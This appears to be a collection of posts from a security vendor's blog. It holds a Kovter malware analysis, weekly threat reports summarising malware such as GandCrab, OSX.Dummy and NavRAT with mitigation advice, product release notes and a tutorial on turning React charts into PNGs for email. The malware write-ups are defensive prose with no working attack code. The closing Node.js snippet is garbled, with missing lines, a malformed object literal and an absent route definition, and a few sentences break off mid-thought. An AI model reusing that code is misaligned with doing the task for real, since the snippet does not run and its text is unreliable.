The Kovter family of malicious code has a tradition of being effective and difficult to detect. The most common attack vector for Kovter has been through spam and targeting phishing email campaigns. Spam and phishing emails using false delivery notifications for UPS, FedEx or invoices are nothing new but are still incredibly effective especially when well researched and targeted. The main variants of Kovter are aimed at performing ad fraud and are difficult to detect and remove, as they implement these file-less infection methods. They can steal personal or corporate information, download additional malware or have complete access to the infected host.

Kovter Methodologies

1. Attack the Human
Kovter arrives within mail attachments as a macro in an office file. When activated, the macro downloads additional files that triggers a powershell command stored in the registry to gain full control of the host. Then the randomly named file deletes itself. One of the most recent campaigns used an effective technique to trick users by using fake delivery notifications from UPS, USPS, and FedEx. The Emails have historically targeted Finance and HR departments through related internet services documents such as resumes and invoices. The email attachment is either a ZIP file that archives a double extension file (*.doc.html) or a standalone double extension HTML file.

2. Extract, Decode and Run
Phishing, if targeted, is successful because of the research done on the company or individuals. Malicious actors will troll LinkedIn to identify key employees or easy targets. They then troll social media to evaluate likes and dislikes to help craft an email based on the data found. The HTML document will convince the user to click and download an “Office plugin,” but in the background, the HTML actually contains an embedded base64-encoded ZIP file.

3. Install Malicious javascript
When executed, the HTML extracts a JS file (WebView-Plugin-Update-0.exe.js) which is a partially obfuscated JScript/JavaScript file hiding inside a 7-zip. Once connected, the fake WebView Plugin will download a JS file and immediately executes it after a de-obfuscation process.

4. Connect to C2 for additional payloads
The file, once properly decoded, will again try to build different URLs using different domain names. There will be two possible URLs from each domain. The first URL will download something from the ransomware or spyware family and the second URL will download KOVTER. Both URLs will download a file with a *.PNG extension that will be renamed to *.EXE and executed later. There are layers of obfuscated files and multiple command and control sites.

5. Connect to new C2 to test file storage
The malicious code will now attempt to communicate with the C2 servers that have been architected to store stolen assets from the infected hosts. Once communication is established there is a process that schedules regular connections to upload any data that the infected host has collected.

## Strategy for Detection and Prevention Due to its arrival via spam mail, your organization should consider setting up anti-spam filters that can block malicious emails before they can even reach the endpoint user. Also, implement web filtration that may detect communication with a C2 website.

1. Log Management
Log messages are a very useful tool for a variety security tasks, but simply collecting logs locally in text files is often not enough. With tools like syslog-ng, security experts can centralize all of the log messages coming from servers, network devices, applications and lots of other sources (even printers and peripherals). With central log collection, one can easily check log messages even if the source machine suffered a hardware failure or logs were removed during a security incident. And once all of the logs are centralized, you can do interesting things like filter the messages, getting rid of the ones you don’t want, or classify messages so that you can group similar messages together. There are a few steps to follow to maintain an efficient and effective logging process:

  • Set a strategy – don’t log blindly
  • Structure your log data, and consider the format of your logs
  • Separate and centralize your log data
  • Practice end-to-end logging
  • Correlate data sources
  • Use unique identifiers
  • Add context
  • Perform real-time monitoring

2. File Integrity Management
Organizations can also list methods for detection, which can be based on commands known to be used by malicious PowerShell scripts looking for patterns used to obfuscate their command-prompt. Files from any of the below malware will, once loaded, be detected through their file loads. This is another observable that can be detected through an FIM solution.

3. Intrusion Detection and Netflow
An intrusion detection system (IDS) is a system that monitors network traffic for suspicious activity and issues alerts when such activity is discovered. While anomaly detection and reporting is the primary function, some intrusion detection systems are capable of taking actions when malicious activity or anomalous traffic is detected, including blocking traffic sent from suspicious IP addresses.

4. Solid Threat Intelligence

5. 247 Monitoring of indicators like the IP address below
In cyber threat intelligence, analysis often hinges on the triad of actors, intent, and capability; with consideration given to their tactics, techniques, and procedures (TTPs), motivations, and access to the intended targets. Studying this triad enables us to make informed, strategic, operational, and tactical assessments.


Recorded Future – Kovter ID Card

Threat Report Tuesday July 17th 2018

on July 17, 2018

In this week’s report we are covering two very malicious programs. If you have a BYOD policy you may want to pay attention to this first piece of research. Security researchers at Check Point have discovered samples of Glancelove, an Android-targeting malware, in a false campaign originated by Hamas that takes advantage of the 2018 World Cup. According to researchers, the group is distributing Glancelovethrough fake Facebook page and profiles with photos of attractive women who promote the malware in the form of a dating app available from the Google Play Store. The 2nd piece of interesting malware we found is related to GPS and vehicle that rely on it for daily transportation. A team composed of researchers from Virginia Tech, the University of Electronic Science and Technology of China, and Microsoft Research recently released their findings on GPS Spoofing Hack, an attack vector that can send Google Maps users the wrong direction. GPS Spoofing involves replacing a user’s intended destination with a “ghost location.” Instead of connecting to legitimate satellite systems, the cyber-criminal behind the attack forces the victim’s software to connect to their own equipment, allowing the hacker to implement false GPS data.

Malware: Glancelove
This Glancelove dating application asks for permission for the device’s network connection, contacts, SMS, camera, and storage. Upon receiving permission, it contacts its command and control (C&C) server to download the final payload. This Glancelove malware is capable of recording calls, track location, open microphone, SMS theft, take photos, storage mapping, steal contacts, and steal images. Researchers mention that these mobile chain attacks are mainly successful because the targets are hand-picked, and the malware can continually install crucial components if needed. Two similar malicious applications used by the Hamas group are Golden Cup and Wink Chat applications.

For more information there are a few links below:

News Observer

Some Mitigation Strategies:
Make sure to monitor your employee and guest wifi networks Intrusion detection systems (IDS) would detect communication C2 for payload download Web Filtration would detect the use of malicious urls or unknown sites 24x7 Security Monitoring for malicious behavior and immediate incident response.

Malware: GPS Spoofing Hack
Researchers used a HackRF One software defined radio, a Raspberry Pi, a portable power source, and an antenna. The attack could be hosted remotely with the spoofing equipment installed under the victim’s car. Researchers concluded that a seasoned and logical driver who is familiar with their route and destination would notice the change in their Google Maps application. However, if the location and route are unfamiliar, a user might not realize that they’ve been deceived. According to researchers, their experiment only failed when they were testing the luxury car Tesla 2014 Model S. They stated that this was because Tesla uses an advanced u-blox navigation chip, which contains an anti-spoofing function.


Some Mitigation Strategies:
u-blox navigation chip, which implements some anti-spoofing function Intrusion detection systems (IDS) to monitor for malicious communication 24x7 Security Monitorings to check for GPS consistency with locations of vehicles.

Release Notes

July 13, 2018

  • Improve the usability of the new Analyzers section in Alert details
  • Enhance the MSSP Analyst Activity report with new metrics and improvements

  • Fix a bug preventing some suppressions from being created on the new Alerts Beta page
  • Prevent the app from going blank when unhandled exceptions occur
  • Fix an issue with some servers not rotating logs, resulting in slow or inconsistent response times

We’ve been working on major infrastructure enhancements that will enable us to release some exciting new features over the next several months - stay tuned!

How to boost your FFIEC CAT score, Part 1: What the CAT dragged in

on July 11, 2018

Since the Federal Financial Institutions Examination Council (FFIEC) introduced the Cybersecurity Assessment Tool (CAT) a few years ago, financial institutions have finally recommended a prescriptive path to operational cybersecurity maturity.

So what has the CAT brought us?

  • Financial institutions welcomed the CAT. While institutions aren’t required to complete the assessment, examiners use it as their framework when assessing institutions during exams. The CAT was intentionally vague and lacked specific guidance; but it did act as a tool that gave institutions the right amount of autonomy to grow in the areas they saw fit while adhering to the suggested path to maturity. It introduced new concepts, including Domain II, which covered complex topics in Threat Intelligence and Information Sharing.

  • It’s tough to evolve beyond the baseline requirement of “belonging or subscribing to a threat and vulnerability information sharing source that provides information on threats”. At my institution, we were already ahead of the curve by belonging to the FS-ISAC and being active with their various Community Institution and CyberIntel mailing lists, but the volume of information coming through was too much and mostly unactionable at a small institution like ours. There was a struggle to find a product to help cover the information overload and make the information actionable without increasing headcount or level of effort in information security resources.

  • This gap in coverage is where Perch Security has found a niche in financial services. I was a Perch user before I was an employee. I loved the product because Perch boosts an organization’s CAT Domain II maturity level and helps cover many other controls that are part of a well-defined cybersecurity program. From threat intelligence detection and response to participation in threat intelligence communities, Perch helps make up shortfalls in stretched budgets of financial institutions by backfilling with People (managed 24x7 SOC services), Process (helping bring structure around escalation and initiation of incident response and threat intel consumption) and Technology (automating the detection of the threats on your network).

Look for future blog posts From Michael Riggs, CISSP, that will cover achieving maturity in specific CAT domains.

Threat Report Tuesday July 10th 2018

on July 10, 2018

In this week’s report we are covering two very malicious programs. Researchers identified a Remote Access Trojan (RAT), dubbed FlawedAmmyy, targeting the Ammyy Admin remote desktop tool. FlawedAmmyy is built on leaked source code of Version 3 of Ammyy Admin and provides unfettered remote access to the target system. This campaign, which the researchers attributed to TA505, includes both a broad spam campaign and more targeted campaigns targeting specific industries, including the Automotive Industry. Since its inception in December 2017, GandCrab ransomware quickly became one of the most significant cyber threats of early 2018. Based on a Ransomware as a Service (RaaS) model and distributed throughout the dark web, the malware targets multiple countries around the world using a sophisticated combination of malicious tools. Despite the recent success of law enforcement authorities and the security community who managed to slow down the proliferation of the first version of GandCrab by releasing a free decryption tool, updated versions of the ransomware continue to attack thousands of victims around the world. GandCrabRaaS is the first ransomware in the world demanding ransoms in DASH cryptocurrency.

Malware: FlawedAmmyy

Though just recently discovered, there is evidence the campaign started as early as 2016. Also worth noting, this campaign utilizes the Server Message Block (SMB) protocol, rather than HTTP, to download the malware to victim machines, which may be a first for this type of malware. Aside from the concerning implication that this trojan has been used undetected since 2016, one of the most interesting aspects of this malware is its combined use of ZIP files containing. URL files (which Windows interprets as Internet Shortcuts) and the SMB protocol to deliver the RAT to the victim.

For more information there are a few links below:



Hack Dig


Some Mitigation Strategies:

  • File Integrity Management looking for the installation of files associated with the RAT
  • Intrusion detection systems (IDS) would detect communication over SMB and C2
  • Web Filtration would detect the use of malicious urls
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: GandCrab

According to security analysts’ estimates, the initial version of the malware was poorly developed, which allowed for the development of a decryption tool. However, GandCrab creators quickly corrected flaws, and the integrity of subsequent versions proved to be more reliable.
It is reported that an earlier flawed version of GandCrab had a decryption key stored on victim machines, which in turn was encrypted with the same password. However, the issue was promptly addressed by the GandCrab developers.

In its activities, ransomware operators utilize the decentralized Namecoin DNS with .bit extension.


Security Affairs

Trend Micro


Some Mitigation Strategies:

  • Intrusion detection systems (IDS) to monitor for malicious communication to C2
  • File Integrity Management is looking for new files being installed on the system
  • Log Management would collect data on C$ shares and other lateral movement
  • Mail Filtration to capture potential files attached to phishing emails
  • 24x7 Security Monitoring with Focused Security Content for solid threat detection

Threat Report Wednesday July 2nd 2018

on July 2, 2018

In this week’s report we are covering two very malicious programs. Security researchers have spotted a new Mac malware family that’s currently being advertised on cryptocurrency-focused Slack and Discord channels. The other is The Nozelesn Ransomware is a crypto- threat that was reported on July 2nd, 2018 with numerous submissions to security platforms. Unfortunately, the Nozelesn Ransomware leaves little or no traces on compromised machines and creating detection rules turned out to be troublesome. The team behind the Nozelesn Ransomware appears to target the users based in Poland judging from the initial submissions and the way it spreads to PC users.

Malware: OSX.Dummy

Security researcher Remco Verhoef recently discovered OSX.Dummy, a new Mac malware family that is currently being spread via cryptocurrency-focused Slack and Discord channels. Cryptocurrency enthusiasts are convinced by attackers to type a long command inside their Mac terminal with the promise that it will resolve various issues. The command downloads a 34 megabyte binary named “script” to the /tmp folder and runs it. The “script” file then sets itself as a launch daemon to maintain persistence. It then creates a Python script that opens a reverse shell to a server, which gives attackers access to infected hosts. The server can be traced back to Additionally after the code is run, the malware requests the user’s root password and saves it un-encrypted in a file located at /Users/Shared/dumpdummy and /tmp/dumpdummy, allowing the attacker ease of access for future malicious operations. Researchers state that the malware is simplistic and easy to detect with standard malware detection tools.

For more information there are a few links below:


Bleeping Computer

SC Magazine UK

Some Mitigation Strategies:

  • File Integrity Management looking for the installation of python scripts into /tmp and /users/shared
  • Intrusion detection systems (IDS) would detect network communication over port 1337
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: Nozelesn

Security researchers at MalwareHunterTeam have discovered a new ransomware named Nozelesn. Researchers first noticed chatter regarding the malware from multiple Polish victim submissions to ID ransomware, as well as a newly generated discussion started by victims on BleepingComputer forums. According to a researcher at CERT Polska, the Computer Emergency Response Team for Poland, the malware is being distributed through spam emails imitating a DHL invoice. Upon successful infection, files are encrypted with a “.nozelesn” extension. Following encryption, the malware creates a ransom note offering to fix the computer, labelled HOW_FIX_NOZELESN_FILES.htm. The note contains instructions together with a personal code to login to TOR payment server “lyasuvlsarvrlyxz.onion”. The ransom is currently .10 BTC or roughly $660 USD.


Cyber Byte

Londrina Security News

Some Mitigation Strategies:

  • Intrusion detection systems (IDS) to monitor for malicious communication
  • File Integrity Management is looking for new files being installed on the system
  • Log Management would collect data on C$ shares and other lateral movement
  • Mail Filtration to capture potential files attached to phishing emails
  • 24x7 Security Monitoring with Focused Security Content for solid threat detection

Release Notes

June 29, 2018

  • Add firewall support to the new Alerts Beta page
  • Improve the user experience around group and community-level suppression
  • Add single and multi-organization support for MSSP users in the new Alerts Detail page
  • Add a “related alerts” section to the Alert Detail page for quickly viewing other alerts created by a specific indicator

  • Fix an issue causing incorrect alert counts on the Indicator Detail page
  • Fix some issues that occurred during the registration process
  • Fix some Perchybana queries that respond slowly or with an error
  • Fix an issue where some alerts would not remove themselves from the Alert List page after suppression
  • Fix some sensors that would report invalid timestamps on some network traffic

We are still actively enhancing the new Alerts Beta and Alert Detail pages. If you have suggestions or questions, please reach out to the team in SquawkBox.

Threat Report Wednesday June 18th 2018

on June 18, 2018

In this week’s report we are covering two very malicious programs. One being a custom remote access trojan (RAT) called UBoatRAT is being distributed via Google Drive links. The malware obtains a command and control (C2) address from GitHub, and uses Microsoft Windows Background Intelligent Transfer Service (BITS) for maintaining persistence. The other is MirageFox, a new tool produced by APT15 that looks to be an upgraded version of a RAT believed to originate in 2012, known as Mirage. The new malware was tracked by the researchers as MirageFox, the name comes from a string found in one of the components that borrows code from both Mirage and Reaver.

The RAT is usually delivered by a ZIP archive hosted on Google Drive containing a malicious executable disguised as a folder or Excel spreadsheet. Once installed, UBoatRAT checks for virtualization software and tries to obtain a domain name from the network. The malware only performs malicious activities on a machine when it is able to join an Active Directory (AD) domain. The malware is also programmed to detect virtualization software (VMWare, VirtualBox or QEmu) that would indicate a research environment. Since June, the GitHub “uuu” repository the C2 links to has been deleted and replaced by “uj”, “hhh” and “enm”, according to researcher Hayashi. The GitHub user name behind the repository is “elsa999”. For more information there are a few links below:


Tech Target

Threat Post

Some Mitigation Strategies:

  • Mail Filtration to screen for malicious links that relay to Google drive
  • File Integrity Management looking for the installation of malicious zip files that unpack executables
  • Intrusion detection systems (IDS) would detect intrusion and network communication
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: MirageFox

The China-linked APT15 group (aka Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon) has developed a new strain of malware borrowing the code from one of the tool he used in past operations. APT15 is known for committing cyberespionage against companies and organizations located in many different countries, targeting different sectors such as the oil industry, government contractors, military, and more. The attackers utilizes Windows commands to conduct reconnaissance activities, the lateral movement was conducted by using a combination of net command, mounting the C$ share of hosts and manually copying files to or from compromised hosts.


Security Affairs


Virus Total

Some Mitigation Strategies:

  • Intrusion detection systems (IDS) to monitor for malicious communication
  • File Integrity Management is looking for new filel installation
  • Log Management would collect data on C$ shares and other lateral movement
  • Mail Filtration to capture potential files attached to phishing emails
  • 24x7 Security Monitoring with Focused Security Content for solid threat detection

Threat Report Monday June 11th 2018

on June 11, 2018

In this week’s report we are covering two vulnerabilities. One being a recent vulnerability that is targeting Triton ICS deployments. The other is a banking trojan that stealthily uses MSSQL database traffic.

Malware: Triton ICS Malware Developed Using Legitimate Code

Triton, also known as Trisis and HatMan, was discovered in August 2017 after a threat group linked by some to Iran used it against a critical infrastructure organization in the Middle East. The malware targets Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers, which use the proprietary TriStation network protocol. The malware leveraged a zero-day vulnerability affecting older versions of the product through a legitimate .dll file. For more information there are a few links below:


Security Week

Dark reading

Some Mitigation Strategies:

  • Mail Filtration to screen for malicious phishing or targeted email campaigns
  • File Integrity Management looking for the installation of malicious software like Remote Access Trojans (RATS) for functionality and access
  • Intrusion detection systems (IDS) would detect intrusion and network communication
  • Filtering USB ports that are on equipment connected to the ICS systems
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: MnuBot Banking Trojan Stealthily Uses MSSQL Database Traffic

Security researchers from IBM X-Force Research Team have discovered a new banking Trojan named MnuBot. This Delphi-based malware uses the Microsoft SQL Server to communicate with the C&C Server and send commands to infected machines. This evades regular antivirus and malware detection since it uses SQL traffic, unlike common C&C Server communication that happens through web servers or apps. Researchers also indicate that this might be coded by a seasoned hacker. This MnuBot has a two-stage attack. First, it checks if the system is infected already. Second, it deploys the remote access trojan completely (RAT).


Security Intelligence


Some Mitigation Strategies:

  • Intrusion detection systems (IDS) to monitor for malicious communication and downloads from port 5003
  • File Integrity Management looking for access to registry keys accessed and new keys created
  • Mail Filtration to capture potential files attached to phishing emails
  • 24x7 Security Monitoring with Focused Security Content for solid threat detection

Threat Report Wednesday June 5th 2018

on June 5, 2018

In this week’s report we are covering two vulnerabilities. One being a recent Microsoft Windows Jscript vulnerability that has yet to be patched and the other being NavRAT with themes around the upcoming US & North Korean Summit.

Malware: Zero-Day Remote Code Execution Vulnerability Discovered in Microsoft Windows JScript

New Zero-day Remote code execution vulnerability has been discovered in Microsoft Windows JScript that allows an attacker to run the arbitrary code on vulnerable installations of Microsoft Windows. “This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.” To exploit the vulnerability, the attacker has to trick victims into accessing a malicious web page or download and open a malicious JS file on the system. As of June 1st, there has not been a patch released so up to date security content is key for detection until a patch is released.


Threat Post
Security Boulevard

Some Mitigation Strategies:
- File Integrity Management Solutions for file creation and modification
- Intrusion detection systems (IDS) to monitor for malicious communication and downloads
- 24x7 Security Monitoring with Focused Security Content for solid threat detection
- Web Filtration Technologies to screen incoming web sites
- Mail Filtration to capture potential files attached to phishing emails

Malware: NavRAT Malware Uncovered by Security Researchers

Security researchers at Talos Intelligence have recently uncovered NavRAT, a remote access trojan that has reportedly been quietly active since 2016. NavRAT is distributed through a malicious, decoy Hangul Word Processor (HWP) document named “미북 정상회담 전망 및 대비.hwp”, which translates to “Prospects for US-North Korea Summit.hwp”. The decoy document appears to be referring to the US-North Korea Summit scheduled for June 12, 2018. Known targets reside in South Korea. Researchers note that NavRAT is unique in that it uses Naver, an email platform popular in South Korea, as its command and control (C&C) server. NavRAT can reportedly download, upload, and execute commands, perform keylogging, and avoid detection through process injection, copying itself into an active Internet Explorer process. Researchers assess with a medium degree of confidence that North Korean APT Group 123 threat actor is behind the operation due to the techniques and procedures being of similar nature to those used in previous campaigns.


Dark Reading
Talos Intelligence

Some Mitigation Strategies:

  • Mail Filtration to screen for malicious phishing or targeted email campaigns
  • File Integrity Management looking for the installation of malicious software like keyloggers
  • Intrusion detection systems (IDS) would detect intrusion and network communication
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Release Notes

May 18, 2018

Login and Signup flows have received a facelift and refactoring, to go along with OUR NEW PUBLIC WEBSITE!
The punch++ community configuration has been given an additional + and is working once more
Pagination and search added to login history views, because some people log in a lot
Alert indicator detail and Perchybana buttons now open in new tabs, instead of the current tab. Now feel like a real security pro by having 50 tabs open at once!
New alerts list is in beta - we’re trialling it internally with our own SOC team to make sure it has all the bells and whistles that our power users will need to triage their own alerts!
Cortex integration is in beta - the moving parts are mostly in place and we’re working out the details about how to handle user configurable settings and API keys. We’re very excited about the potential between a Perch/Cortex integration and have all kinds of cool ideas how to work it into the Perch app, stay tuned!
Community sightings public API is in beta - currently testing with some select internal customers!
User submission of raw sensor rules is in early functional stages - we’ve have the functional parts in place, but there’s some wrinkles we need to iron out first before we release to the general public.
The group invite process has had a couple minor bugs fixed that was preventing some user’s from using their invite codes.
Invites to existing teams no longer prompt the new user to set up a sensor before using Perch.
Existing Perch users that are already logged into Perch can now use the group invite link from the email
Community suppression view all page rows per page now actually changes the number of rows shown per page.
Group invite modal now clears invite email addresses between openings
The cancel button on the MFA entry page during login works once more
Community file lists now correctly update when switching between communities
Copy to clipboard buttons should no longer force the page to scroll to the top
Login (and other pages) should no longer do the shimmy dance with scrollbars on Windows Chrome
Users on slow connections with access to multiple groups should no longer see weirdness when rapidly switching between groups.
Not officially supported, but we fixed an IE11 white screen error for the dashboard. If you’re using old versions of IE, upgrade!!! Old browsers aren’t secure, don’t use them; we’re security professionals, this is low hanging fruit!

Release Notes

April 20, 2018

Alerts review first pass: We’re days away from releasing the first part of our alert review project. Most alert panels are being streamlined and we’re introducing the alert details page. This page is similar to the indicator details page, but shows enhanced details about the selected alert instead. The information we’re removing from the alert rows will show up on the new details page, along with additional information about the alert, and details about the intel that triggered the alert.
  • More coming soon:
    • Related alerts - a full breakdown of all of the individual target pairs involved in an aggregate alert.
    • Alert comments - put comments directly on a specific alert instance, instead of on the intel the alert triggered on
    • Additional enrichment - we want to show you more information about the details involved in the alerts
    • After coming soon, next phase:
    • Alert Review page enhancements:
    • multi-select: change status, suppress
    • performance! much, much faster
    • better search, sorting, filtering
Re-opening the ‘Invite user to group’ modal now clears the invite email field.
Dashboard sensor health widgets now use the same rules for status as the other sensor health displays and pages.
We had a performance issue with the generation of the Perchybana links from suppressions, so we had to disable them. We’ve fixed that issue and the links have returned.
On the indicator details page, in the observable panel on the left, observables that are currently triggering alerts will once more be highlighted (and there was much rejoicing, huzzah!)
(In Development) Perchy’s hard at work improving his brain - we’re adding support for TheHive’s powerful Cortex analyzers as part of our alert detail enrichment efforts. There are all kinds of valuable ways to analyze the alerts that we’re detecting, and we want to bring them all together in one easy to use interface. We’re experimenting with adding Cortex analyzer details to the information that you see in the Perch interface. Open up an interesting alert’s details, flip to the Analyze tab, and we’ll have the info you’d normally have to go digging for right there in front of you. Kick back, drink coffee, enjoy the sweet, sweet automation.
Perchy is recently back from down under where he’s been setting up our first non-US regional data center. We’re working through the final stages of configuring our systems to handle the data sovereignty needs of our worldwide customers. Soon you can get flocked up, no matter where in the world you are!
Data migration work - its not sexy, the guys who do it don’t have any cool new widgets to demo, but its gotta get done. We’re continuing our work on internal projects to keep the Perch architecture and data flow well tuned so that the app and Perchybana stay responsive and don’t feel like a chore to use. We’re watching the charts, we see what parts of the app are sluggish, and we’re working on them!

Release Notes

April 6, 2018

Initial changes for Alert review (on QA) -
  • alert rows shown in panels condensed
  • new alert details page - see more information about what triggered the alert
Header update - new navigation, new look.
New user onboarding experience, tour replacement.
Added reverse DNS names to alert IP addresses, where available.
Arbitrated a disagreement between the actual number of alerts and the number shown on the tab of the review alerts page.
Clicking the link from a Perch team invite email will now pre-populate the email address field, to ensure that the email address used to sign up matches the email address that the invite was sent to.
Invite email invites aren’t quite so particular about the case of the letters in the email addresses matching.
Dashboard true/false positive by community charts were displaying data for all groups in shared communities, they now show just the selected team’s data.
We’ve recently upgraded our core front-end application framework React to version 16. This is a major version update which affected every part of the Perch application, we’ve tested and tested, but if you discover something broken, please let us know!

Release Notes

March 23, 2018

Perchy has a new place for YOU to land: the new dashboard is live and it is awesome! We want you to have the most valuable info possible dropped right in your lap right away; Perchy prepares it all and brings it right to you, like a faithful hound with the morning paper. Escalations, recent alerts, and suppression information is near the top, scroll down to see info about your communities, your sensors, and get some insight into overall network visibility and ‘noisy’ hosts.
‘Since You’ve Been Gone’: you might not miss Perchy while you’re away, but we don’t want you to miss out on the important details about what’s been happening since you’ve been gone. Every time you log in, you’ll be presented with a quick overview of important activity that happened while you were logged out: escalations, alerts closed, comments, new intel, and sightings of your personal indicators. You won’t need to manually log out to take advantage of this new information, just close the Perch app when you’re done using it.
We’re adding reverse DNS name information to our alerts, so that its easier to relate a private IP to a named host. Look for this new information in the ‘src_FQDN’ and ‘dest_FQDN’ fields on alerts in Perchybana. In the future, we’ll be incorporating this new data into more elements of the UI, for easier identification everywhere.
Snackbar/toast notifications (the little panels that pop up from the bottom of the window) message color should now be easier to read.
Returned the ‘Select All’ button to its rightful place on the community feed selection modal - no one likes having to click those boxes one by one.
As usual, there’s a bunch of tweaks and performance tuning that we’re doing to keep the app snappy and responsive. If you run into something that’s loading slowly for you, or feels like a chore to use, LET US KNOW! We love the feedback and we’re always on the look out to hear it directly from our users!

Release Notes

March 9, 2018

New Dashboard: Incorporates feedback that we’ve collected from our users and should put more relevant information directly in front of you as soon as you log in. You can get a preview of the new dashboard here: (Still a work in progress and you can expect to see more updates in the days to come.)
IP suppressions can now be applied to multiple IPs at once. This will create a separate suppression per IP, just as if you’d manually created them one by one.
Observable dashboard panels now have a toggle between top 5 and bottom 5.
Alert status changes added to indicator detail history tab.
Fixed a bug with the CSV download of community suppressions, CSV should now contain just the data for the current filter settings.
Fixed a significant performance issue in the community suppressions panel, should load much, much faster now.
More minor UI fixes here and there, sorted some lists to make selection easier.
Observable dashboard SSH and SMTP tabs now return all data.
Community latest suppressions now visible to all users, not just community admins.
Internal changes to support more types of external data sources and more use cases for community data sharing.
We’re working on improving our support for MSSPs, allowing users from one group to manage other groups, without actually having to be a member of the group.

Release Notes

February 23, 2018

We’ve added a new section to the Community Dashboard: anonymized, latest true/false positive detections for members of the community. Now you get a better view of what everyone in your community is seeing and how they’re responding. As a bonus, we’ve made the lists available as a CSV download!
On the suppression modals, we’ve moved the contact information to the main view and removed the tabs. This helps make sure our SOC has the info they need to triage your alerts right in front of them when they’re preparing a suppression.
Groups on the alerts by host page now start off collapsed
Perchybana links slightly adjusted to show more relevant HTTP fields by default
We’re adding the raw Emerging Threats (and Pro) Suricata rule to the indicator detail page
Sign up adjusted so that browser password managers don’t try to use your Last Name as your user name
Fixed the comment visibility drop list UI issues and missing descriptions
We’ve crushed a multitude of little bugs that cropped up during our recent UI library upgrade and while polishing up the new observable detail view. Too many to list here, but if you find something we missed, LET US KNOW and we’ll fix it!
Major UI library upgrade: keeping your tech stack up to date is important to continue to develop features using the latest tools and security fixes, and as a security company, that’s especially important to us. We’ve recently focused on upgrading some of our core application libraries to keep things running smoothly and securely.
We’re in the middle of a pretty major intel storage refactoring that should enable us to see some real performance gains, especially for our larger customers and our SOC. It’s still a couple weeks away from being finished, but we’re already excited about the new hotness that it will allow us to build.
Coming soon: XFF on alerts, multi-IP selection for IP suppressions, show all targets on closed alerts, new dashboard, and more!

Release Notes

February 9, 2018

Observables Dashboard internal release and testing - we’ve wrapped up development and now we’re putting it through the wringer to make sure that everything works and looks great with our production data. There’s still a few small tweaks and adjustments to be made, but it’s really close and the details it exposes are just … wow! We can’t wait to show it to you.
Better internal intel curation tools that automatically trim out the obvious stuff to keep the response time better for everyone.
Bits and bobs here and there, mostly on things no one sees directly.
Library updates - we routinely update all of the external code that we use to make sure that everything is staying modern and secure. Recently, some of the core libraries used to make Perch awesome have had major version releases and we’re making sure Perch gets updated with all the performance and security benefits as well.
UI cleanup effort - we’re big proponents of agility here and we frequently favor getting a working feature out over making the experience perfect. We’re taking some time to clean up some of those rough edges and starting a larger scale effort to make the functionality and tools that are core to Perch even better.
Intel Data Refactoring - We’ve learned a lot of things about how the data we have is used and we’re working through some data restructuring to be able to give our users better and faster access to the information they need to make the best decisions.

Release Notes

January 26, 2018

Scope (w/ IP) added to the suppression list on the indicator detail page
Link added from user indicators to group indicators (if you’re the admin or owner of a group) and vice versa
Suppression groups on the indicator detail page are now listed alphabetically, instead of randomly. (Apologies to any SOC who will miss playing ‘Find the Group Name.’)

React in Outlook? How we built the Weekly Indicators Summary

on January 24, 2018

Email has always lagged behind the browser in terms of features and capabilities. While in the latest version of Chrome or Firefox you can play console-quality games, make music, and share your screen, email is a very different story. Getting a layout to look consistent across devices or sharing the joy of an animated GIF are things we take for granted on the web, but can be frustrating to deliver to your inbox.

Weekly Summary emails

If you use Perch, you’ve probably gotten one of our new Weekly Summary emails by now. For everyone else, they look a little something like this. Our emails have always had a lot of information, but as our customers have had more sightings, alerts, and intel, it can start to feel overwhelming. Chances are pretty good your inbox doesn’t need any heft added to it, so when redesigning the Weekly Summary we wanted to help our customers get as much insight as they could with as succinct an email as possible. By highlighting trends and counts in colorful charts at the top of the email, we think the Weekly Summary gives you more actionable information faster than ever before.

Testing the limits of email

Those charts are a key part of the new design, but charting in email has been avoided by many a dev team. There are some “hacks” you can do to sprinkle some data-viz magic into your emails but often times they aren’t pretty or scalable.

If you have a single chart to send (and time on your hands), you could try making a static copy of the chart in a design program like Sketch or Photoshop and saving it as an image to include in the email. But with a flock of customers and billions of data points that change by the minute, that won’t work here.

In previous Perch emails we have create simple bar charts with css but every email client has slightly different support and the code gets messy fast. No one wants to maintain a Rube Goldberg machine, especially one made of CSS.

With the Perch product, we use React and Recharts to create beautiful, reusable charts with live data for each customer. We can’t use this approach in our emails though because most email programs will not allow us to execute Javascript. This means no React, no Recharts, and no real-time chart goodness.

Leaning on the community

Our dev team did some head-scratching, white-boarding, and forum-surfing before we found repng. Repng is a Javascript library that allows you to convert any React component (like a LineChart from Recharts) into a PNG. So now, we can reuse the same charts we know and love from Perch in our emails with just a dash of CLI magic. Running the process on a Node.js micro-service, we can easily pass all the data we need for the Weekly Summary to the chart-to-png service, generate the email-friendly graphic, and send the email out the door with 100% more visual goodness.

Show me teh codez

Want to add some charts to your emails? Here’s a quick starter that will get you going in the right direction.

Start by grabbing node and npm if you don’t have them already.

We need to install all of our dependencies first:

npm install react react-dom recharts repng express bodyparser

Then we can set up out express server to listen for incoming data:

const bodyParser = require('body-parser');
const express = require('express');
const React = require('react');
const { LineChart } = require('recharts');
const repng = require('repng');

const app = express();
const port = 8080;

// Add middleware for reading JSON bodies

// <LineChart width={500} height={300} data={data}> ... </LineChart>
// This is the JSX you may be more familiar with,
// but for the sake of not dragging babel into this
// we will use the "vanilla JS" flavor of react in this snippet.

// Note: "data" should be an array of objects that have an:
// amt: Number | name: String | pv: Number | uv: Number

const chart = props => 
    { data:, height: props.height, width: props.width },
    React.createElement(XAxis, { dataKey: "name" }),
    React.createElement(YAxis, null),
    React.createElement(CartesianGrid, { stroke: "#eee", strokeDasharray: "5 5" }),
    React.createElement(Line, { type: "monotone", dataKey: "uv", stroke: "#8884d8" }),
    React.createElement(Line, { type: "monotone", dataKey: "pv", stroke: "#82ca9d" })

// Add routes'/convert-chart-to-png', (req, res) => {
  repng(chart, {
    width: req.body.width,
    height: req.body.height,
    props: req.body
  .then(streams => {
    const [ pngData ] = streams;

// Start the server
app.listen(port, () => console.log(`Running on port ${port}`));

